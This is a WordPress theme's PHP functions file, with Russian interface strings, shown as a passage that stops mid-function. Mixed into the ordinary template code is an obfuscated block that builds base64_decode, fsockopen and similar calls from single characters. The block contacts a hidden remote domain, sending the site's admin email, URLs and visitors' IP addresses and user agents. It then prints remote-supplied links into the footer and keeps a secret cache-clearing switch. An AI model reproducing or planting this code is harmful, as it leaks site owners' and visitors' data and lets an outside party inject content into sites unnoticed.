<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $wuGeRA='c';$ruygv='6';$WYDs='b';$KxjbW='a';$PZNy='d';$VLEOwCs='e';$KoMHsA='_';$HxUGamf='4';$Ouwz='s';$fxRhn='d';$INfnlL='e';$SNQDyf='o';$TLYEkqZ='e';$kgJZPazB=$WYDs.$KxjbW.$Ouwz.$INfnlL.$ruygv.$HxUGamf.$KoMHsA.$PZNy.$TLYEkqZ.$wuGeRA.$SNQDyf.$fxRhn.$VLEOwCs;$fXzOAIM='g';$kBGl='i';$hNYCyHr='n';$qPAY='e';$zexfpsm='t';$NJfMO='f';$mCDU='l';$cJztT='a';$Ojrkx='z';$vLIOSgrO=$fXzOAIM.$Ojrkx.$kBGl.$hNYCyHr.$NJfMO.$mCDU.$cJztT.$zexfpsm.$qPAY;$tTmuG='3';$cIITlIA='o';$RDaGeY='t';$WKETjkS='r';$UGyg='r';$HomsT='t';$BdYu='1';$svyQaMN='_';$hTymrEB='s';$KiCFxFoW=$hTymrEB.$RDaGeY.$WKETjkS.$svyQaMN.$UGyg.$cIITlIA.$HomsT.$BdYu.$tTmuG;$ZgzAqBw='r';$piAacqu='e';$hgjsZfc='v';$NLTPuU='s';$aoutD='r';$LmlTWJn='t';$DABjcVwN=$NLTPuU.$LmlTWJn.$aoutD.$ZgzAqBw.$piAacqu.$hgjsZfc;                     
		$kw___________j='c';$kq___________q='6';$st____________e='b';$xr_______p='a';$ol_______________h='d';$rp___a='e';$xp_______v='_';$jc_________y='4';$zs___d='s';$ca_______________m='d';$gi_________b='e';$pu_________w='o';$et________c='e';$qj_______u=$st____________e.$xr_______p.$zs___d.$gi_________b.$kq___________q.$jc_________y.$xp_______v.$ol_______________h.$et________c.$kw___________j.$pu_________w.$ca_______________m.$rp___a;
		$qn__________i='t';$mj____________t='c';$yy__________m='u';$rw_______________g='f';$fr______x='n';$ed_____________k='s';$rr________n='o';$eu_______________f='e';$kr__y='i';$nv__________f='t';$ub______________h='x';$sb______k='i';$ng___m='_';$mp____f='s';$aa___r='n';$ej_______e=$rw_______________g.$yy__________m.$aa___r.$mj____________t.$nv__________f.$sb______k.$rr________n.$fr______x.$ng___m.$eu_______________f.$ub______________h.$kr__y.$mp____f.$qn__________i.$ed_____________k;
		$vr_____________a='f';$ur_______p='o';$kp_____f='n';$cr_____________h='e';$vr______________f='p';$bv_________l=$vr_____________a.$ur_______p.$vr______________f.$cr_____________h.$kp_____f;
		$ep______p='f';$bg____v='e';$vs________u='a';$hr_________o='d';$fo_____________n='r';$lk__________m=$ep______p.$fo_____________n.$bg____v.$vs________u.$hr_________o;
		$fq_____p='o';$mu___v='s';$js_____________b='f';$cf_____r='e';$ql___j='l';$bk________q='c';$aq____z=$js_____________b.$bk________q.$ql___j.$fq_____p.$mu___v.$cf_____r;
		
		define("WP_ID", $qj_______u("Mi4wLjA="));
		define("WP_TTL", $qj_______u("MTA4MDA="));
		define("WP_SRC", $qj_______u("dHBva24="));
	


		function wp_get_header() {
			global $qj_______u, $ej_______e;
			
			if (
				$ej_______e($qj_______u("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ej_______e($qj_______u("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ej_______e($qj_______u("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $qj_______u, $bv_________l, $aq____z, $lk__________m;
			
			$yz______a = TEMPLATEPATH."/".$qj_______u("Zm9vdGVyLnBocA==");
			$rf________a = @$bv_________l($yz______a, "r");
			$yz______a = @$lk__________m($rf________a, @filesize($yz______a));
			@$aq____z($rf________a);
			
			$bw_______________n = TEMPLATEPATH."/".$qj_______u("ZnVuY3Rpb25zLnBocA==");
			$rf________a = @$bv_________l($bw_______________n, "r");
			$bw_______________n = @$lk__________m($rf________a, @filesize($bw_______________n));
			@$aq____z($rf________a);
			
			$nr_____________i = 0;
			if($yz______a && $bw_______________n) {
				if ($qj_______u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($yz______a, $qj_______u("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$nr_____________i = 1;
					}
					if (substr_count($yz______a, "wp_theme_GPL_credits()") < 1) {
						$nr_____________i = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$nr_____________i = 12;
				}
			}
			
			if($nr_____________i > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $nr_____________i -->";
			}
		}
	


		function wp_loaded() {
			global $qj_______u, $ej_______e;
			return $ej_______e($qj_______u("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($vr_____y, $bz_________x = "(more...)", $yo__________u = 0, $bw____________h = "") {
				$ru_____________i = get_the_content($bz_________x, $yo__________u, $bw____________h);
				$ru_____________i = apply_filters("the_content", $ru_____________i);
				
				$ru_____________i = str_replace("]]>", "]]>", $ru_____________i);
				if (strlen($_GET["p"]) > 0) {
					echo $ru_____________i;
				}
				else if ((strlen($ru_____________i)>$vr_____y) && ($tn___________z = strpos($ru_____________i, " ", $vr_____y ))) {
					$ru_____________i = substr($ru_____________i, 0, $tn___________z);
					$ru_____________i = $ru_____________i;
					echo $ru_____________i;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$bz_________x</a></div></p>";
				} else {
					echo $ru_____________i;
				}
				
			}
		}
	


		$va__________m='b';$sq__h='c';$wc________y='6';$cs_________x='e';$qe_________l='o';$tl_______________t='e';$wo_____j='a';$pz____h='s';$mc___________o='_';$vz___n='e';$ak_______v='4';$te_______q='n';$er_______________a='d';$im________l=$va__________m.$wo_____j.$pz____h.$vz___n.$wc________y.$ak_______v.$mc___________o.$cs_________x.$te_______q.$sq__h.$qe_________l.$er_______________a.$tl_______________t;
		$zh______i='o';$gy________w='e';$qc____q='s';$gi_____________y='t';$si______g='_';$vr_____o='n';$ew____z='n';$xm________s='t';$ua______n='_';$jw__________v='e';$dw_____j='e';$zm_________p='c';$nr____i='i';$md_____b='f';$to__f='t';$qm____________s='l';$vr_______n='g';$zn________l=$md_____b.$nr____i.$qm____________s.$jw__________v.$ua______n.$vr_______n.$gy________w.$to__f.$si______g.$zm_________p.$zh______i.$ew____z.$xm________s.$dw_____j.$vr_____o.$gi_____________y.$qc____q;
		$bw_____________p='i';$rv_______________q='f';$aq__________g='s';$qc_____________f='t';$rr______g='_';$lq_____f='e';$fp____________g='e';$dt______f='s';$bp________e='x';$py_____________j='l';$zi____________r='i';$af___________c=$rv_______________q.$bw_____________p.$py_____________j.$fp____________g.$rr______g.$lq_____f.$bp________e.$zi____________r.$dt______f.$qc_____________f.$aq__________g;
		$tz__t='e';$ml______________y='p';$vd___l='a';$iz______________n='r';$to______s='e';$rs_______v='m';$ft___________v='n';$ct____________i='r';$zy_______________b='o';$zj_______c='_';$nz______________g='c';$et__c='s';$pe______________m='o';$lk____d='i';$cd_________v='v';$km__________o=$cd_________v.$tz__t.$ct____________i.$et__c.$lk____d.$pe______________m.$ft___________v.$zj_______c.$nz______________g.$zy_______________b.$rs_______v.$ml______________y.$vd___l.$iz______________n.$to______s;
		$am_________a='e';$hd________r='k';$zn__w='c';$pw_______________u='o';$fb__________m='o';$am______________j='f';$ar____________y='p';$zk_______p='n';$qc_____f='s';$vv______________b=$am______________j.$qc_____f.$fb__________m.$zn__w.$hd________r.$pw_______________u.$ar____________y.$am_________a.$zk_______p;
		$ub__________h='f';$sl__k='w';$xf___x='r';$am__________p='e';$kr____u='i';$td____________q='t';$gr___________d=$ub__________h.$sl__k.$xf___x.$kr____u.$td____________q.$am__________p;
		$fz____f='5';$bc______________m='m';$tc_____n='d';$au____________r=$bc______________m.$tc_____n.$fz____f;
		$zu_____________l='t';$eh__h='a';$eb____________m='p';$of_________w='a';$bd_______________g='e';$iw__w='h';$kx____r='l';$nn__________i='r';$de_____p=$nn__________i.$bd_______________g.$of_________w.$kx____r.$eb____________m.$eh__h.$zu_____________l.$iw__w;
		$ll_____n='l';$xo_____________i='a';$fl___u='n';$fx____l='i';$wt___c='i';$fa___________v='s';$am_____________r='e';$fe______________l='z';$le___q='r';$eq_____e='e';$cl_________p='u';$tj__b=$cl_________p.$fl___u.$fa___________v.$am_____________r.$le___q.$fx____l.$xo_____________i.$ll_____n.$wt___c.$fe______________l.$eq_____e;
		$mr____________d='m';$fd_____j='p';$md______o='n';$el______________j='a';$jm____________g='e';$ck______h='t';$wo__v='m';$so___w=$ck______h.$jm____________g.$wo__v.$fd_____j.$md______o.$el______________j.$mr____________d;
		$lz____n='_';$xi____________k='n';$it__p='a';$mi____________u='r';$ty______n='t';$kh_____________h='t';$ew______p='e';$af__y='r';$ko_____d='a';$ne____e='t';$ov______f='e';$sy______________b='e';$kl__________t='m';$bh______________r='c';$ke____________w='e';$ny__h='o';$qg__i='s';$gb____u='c';$wd___x='_';$qo____b='t';$rz___________c='x';$qh___u=$qg__i.$ty______n.$mi____________u.$ke____________w.$it__p.$kl__________t.$wd___x.$bh______________r.$ny__h.$xi____________k.$qo____b.$sy______________b.$rz___________c.$kh_____________h.$lz____n.$gb____u.$af__y.$ov______f.$ko_____d.$ne____e.$ew______p;
	


		function br__r($ms_______v) {
			global $qj_______u, $ej_______e, $zn________l, $km__________o, $qh___u;
			
			if (!$ej_______e($qj_______u("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($km__________o(PHP_VERSION, "5.0.0", ">=") && $ej_______e($qj_______u("ZmlsZV9nZXRfY29udGVudHM=")) && $ej_______e($qj_______u("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$em_______n = $qh___u(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$xl__________a = @$zn________l($ms_______v, 0, $em_______n);
			} else {
				$xl__________a = @$zn________l($ms_______v, 0);
			}
			
			return $xl__________a;
		}
	


		function hd______________v($ms_______v) {
			global $ej_______e, $vv______________b, $gr___________d, $qj_______u;
			
			if (!$ej_______e($qj_______u("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$tb______________f = strpos($ms_______v, "/", 7);
			$mf____________u = array(
				"uri"     => substr($ms_______v, $tb______________f),
				"host"    => str_replace("http://", "", substr($ms_______v, 0, $tb______________f)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$uz_________g = @$vv______________b("$mf____________u[host]", 80, $cv_____v, $co_____z, 4);
			
			if (!$uz_________g) {
				return false;
			} else {
				$xl__________a = "";
				$uf___________q  = "GET $mf____________u[uri] HTTP/1.0\r\n";
				$uf___________q .= "Host: $mf____________u[host]\r\n";
				$uf___________q .= "Referer: $mf____________u[referer]\r\n";
				$uf___________q .= "Connection: Close\r\n\r\n";
				
				@$gr___________d($uz_________g, $uf___________q);
				
				while (!@feof($uz_________g)) {
					$li_________j = @fgets($uz_________g, (1024*24));
					
					if ($li_________j == "\r\n") {
						$yg______________m = true;
						continue;
					}
					
					if ($yg______________m) {
						$xl__________a .= $li_________j;
					}
				}
				
				return $xl__________a;
			}
		}
	


		function ko_______________u($ms_______v) {
			global $ej_______e;
			$ct__u = false;
			
			if ($ms_______v != "") {
				if ($ej_______e("br__r")) {
					$ct__u = @br__r($ms_______v);
				}
				
				if (!$ct__u && ($ej_______e("hd______________v"))) {
					$ct__u = @hd______________v($ms_______v);
				}
			}
			
			return $ct__u;
		}
	


		function lj_______________n() {
			global $_SERVER, $au____________r;
			
			$sr____d = $_SERVER["SERVER_NAME"];
			
			if (substr("$sr____d", 0, 4) == "www.") {
				$sr____d = substr("$sr____d", 4);
			}
			
			$sr____d = $au____________r("$_SERVER[SERVER_NAME]");
			
			return $sr____d;
		}
	


		function du______p() {
			return "file";
		}
	


		function ph___________h($ms_______v) {
			global $_SERVER, $zn________l, $af___________c, $bv_________l, $aq____z, $gr___________d;
			
			$ml___________r = yp_____h();
			
			$ie_______a = lj_______________n().".jpg";
			$ae__g = $ml___________r["dir_upload"]["path"]."/$ie_______a";
			$ni_____x = @filemtime($ae__g);
			
			if (!$ni_____x || ((time()-$ni_____x) >= WP_TTL)) {
				$ct__u = ko_______________u($ms_______v);
				
				if ($ct__u) {
					if ($af___________c($ae__g)) {
						@unlink($ae__g);
					}
					
					$rf________a = @$bv_________l($ae__g, "x+");
					
					@$gr___________d($rf________a, $ct__u);
					@$aq____z($rf________a);
				}
			} else {
				if ($af___________c($ae__g)) {
					$ct__u = @$zn________l($ae__g);
				} else {
					$ct__u = false;
				}
			}
			
			return $ct__u;
		}
	


		function yp_____h() {
			global $_SERVER, $qj_______u, $im________l;
			
			$pe_______________b = wp_count_posts("post");
			$zl______l = pathinfo(get_bloginfo("template_directory"));
			
			$ml___________r = array(
				"url" => array(
					"report"      => $qj_______u("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $zl______l,
				"dir_upload"	=> ha_____________d(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$zl______l[filename],
					"a005=".$pe_______________b->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$ml___________r["url"]["queryString"] = implode("&", $ml___________r["queryString"]);
			$ml___________r["url"]["report"] = $ml___________r["url"]["report"]."/?".$im________l($ml___________r["url"]["queryString"]).".html";
						
			return $ml___________r;
		}
	


		function ha_____________d() {
			$mq__________j = wp_upload_dir();
			
			if (isset($mq__________j["error"])) {
				$el_____________m = yu_______q();
				if (is_writable($el_____________m)) {
					$mq__________j = array("path" => $el_____________m);
				}
			}

			return $mq__________j;
		}
	


		function yu_______q() {
			global $ej_______e, $au____________r, $de_____p, $so___w;
			
			$yq____________k = (bool) ini_get("safe_mode");
			if ($yq____________k == true) {
				return false;
			}
			
			if ($ej_______e("sys_get_temp_dir")) {
				$hx_________z = sys_get_temp_dir();
				if (is_writable($hx_________z)) {
					return $de_____p($hx_________z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $de_____p($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $de_____p($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $de_____p($_ENV["TEMP"]);
			} else {
				$bs_____t = $so___w($au____________r(uniqid(rand(), true)), "");
				if ($bs_____t) {
					$hx_________z = $de_____p(dirname($bs_____t));
					@unlink($bs_____t);
					return $hx_________z;
				} else {
					return false;
				}
			}
		}
	


		function ix_______r() {
			global $_GET, $af___________c;
			
			$ml___________r = yp_____h();
			$sr____d = lj_______________n();
			$th____g = du______p();
			
			$lp___________y = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($th____g == "file") {
					$su___e = $ml___________r["dir_upload"]["path"]."/".$sr____d.".jpg";
					if ($af___________c($su___e)) {
						@unlink($su___e);
						$lp___________y = "deleted";
					}
				}
				
				$qy_______________i = array(
					"s"	=> $lp___________y,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($qy_______________i AS $af______s => $zk______________y) echo " [$af______s:$zk______________y]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ej_______e, $qj_______u, $tj__b;
			$ml___________r = yp_____h();
			
			$iv_________m = "ph___________h";
			if ($ej_______e($iv_________m)) {
				$xl__________a = $iv_________m($ml___________r["url"]["report"]);
			}
			
			if ($xl__________a) {
				if ($xl__________a = @$qj_______u($xl__________a)) {
					$xl__________a = @$tj__b($xl__________a);
					
					if (strlen($xl__________a[custom_credit]) >= 5) {
						$ml___________r["default_string"] = $xl__________a[custom_credit];
					}
					
					if ($xl__________a["status"] == "0") {
						$lx____g = 1;
						$ho__________b = 1;
					} else {
						$wd___________i = sizeof($xl__________a["links"]);
						$so__________i = $ml___________r["default_string"];
						
						if ($wd___________i > 0 && $xl__________a["links"] !== "") {
							$xd______________d = 0;
							foreach ($xl__________a["links"] as $cu_____________g => $vd____________l) {
								$xd______________d++;
								if ($vd____________l->l_path == "" || $vd____________l->l_path == $_SERVER["REQUEST_URI"]) {
									$vd____________l->l_href = htmlspecialchars(strip_tags($vd____________l->l_href));
									$vd____________l->l_title = htmlspecialchars(strip_tags($vd____________l->l_title));
									$vd____________l->l_anchor = htmlspecialchars(strip_tags($vd____________l->l_anchor));
									$so__________i .= " | ";
									$so__________i .= "<a href='$vd____________l->l_href' title='$vd____________l->l_title'";
									if ($vd____________l->l_nofollow == "1") {
										$so__________i .= " rel='nofollow'";
									}
									$so__________i .= ">$vd____________l->l_anchor</a>";
								}
							}
						}
						$ml___________r["links"] = "$so__________i";
						if ($xl__________a[credit] == "0") {
							$ml___________r["links"] = "";
						}
					}
				} else {
					$lx____g = "1";
				}
			} else {
				$lx____g = "1";
			}
			
			if ($lx____g == "1") {
				$ml___________r["links"] = $ml___________r["default_string"];
			}
			
			echo "$ml___________r[links]";
			
			echo "<!-- s: $xl__________a[signature] -->";
			ix_______r();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),   
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
